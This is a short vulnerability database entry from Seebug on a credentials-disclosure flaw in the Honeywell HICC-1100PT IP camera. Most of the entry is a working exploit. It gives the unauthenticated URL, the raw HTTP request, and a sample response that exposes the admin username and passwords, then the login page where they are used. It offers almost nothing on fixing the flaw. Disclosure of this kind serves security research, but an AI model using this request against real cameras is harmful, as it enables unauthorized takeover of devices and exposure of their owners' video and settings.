Honeywell IP-Camera HICC-1100PT - Credentials Disclosure

2016-08-23T00:00:00
ID SSV:92326
Type seebug
Reporter Lucifer
Modified 2016-08-23T00:00:00

Description

imply go to the following url: http://host:port/cgi-bin/readfile.cgi?query=ADMINID

Should return some javascript variable which contain the credentials and other configuration vars: var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0";

Request: GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1 Host: host:port Connection: close

Response: ``` HTTP/1.0 200 OK Connection: close Content-type: text/html

var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; ```

Login @ http://host:port/cgi-bin/chklogin.cgi